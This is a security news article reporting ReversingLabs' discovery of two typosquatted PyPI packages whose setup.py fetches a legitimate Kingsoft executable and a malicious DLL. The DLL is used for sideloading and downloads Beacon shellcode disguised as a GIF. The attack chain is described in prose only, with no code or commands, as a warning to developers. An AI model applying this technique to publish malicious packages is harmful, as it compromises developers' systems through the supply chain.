Malicious PyPI Packages Bypass Security with DLL Sideloading

In a recent investigation conducted by security specialists from ReversingLabs, two malicious packages were identified within the Python Package Index (PyPI) repository, utilizing the DLL Sideloading technique to circumvent antivirus detection and execute malicious code.

The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times, respectively, before their removal from the repository. These figures highlight that even short-lived malicious packages can find their victims among developers.

setup.py – Downloading the files

These malicious packages mimic the names of legitimate tools from ChapVision used in marketing automation. The technique, known as Typosquatting, is widely employed by malefactors targeting package repositories.

Contained within both packages is a “setup.py” script that initiates the download of two files: a legitimate executable file from Kingsoft (“ComServer.exe”), vulnerable to DLL Sideloading, and a malicious DLL (“dgdeskband64.dll”). The employed technique is notably stealthy.

The malicious DLL’s objective is to connect to a domain controlled by the attackers to download a file disguised as a GIF. In reality, this is a shellcode for Beacon — a tool extensively used in cyberattacks following the initial compromise of a system, enabling a range of malicious activities, including data harvesting, network traversal, and the installation of additional tools.

The ReversingLabs researchers believe that the discovered packages are part of a larger campaign aimed at disseminating similar malicious executables, underscoring the need for vigilance on the part of developers and organizations.

Experts emphasize the critical importance for development organizations to be aware of the threats associated with supply chain security and the use of open package repositories.

Organizations must rigorously verify source code and dependencies and implement additional monitoring and security measures to respond promptly and protect their systems should an infection occur.

Strengthening cybersecurity and addressing threats in the software supply chain remain paramount tasks for organizations and developers today.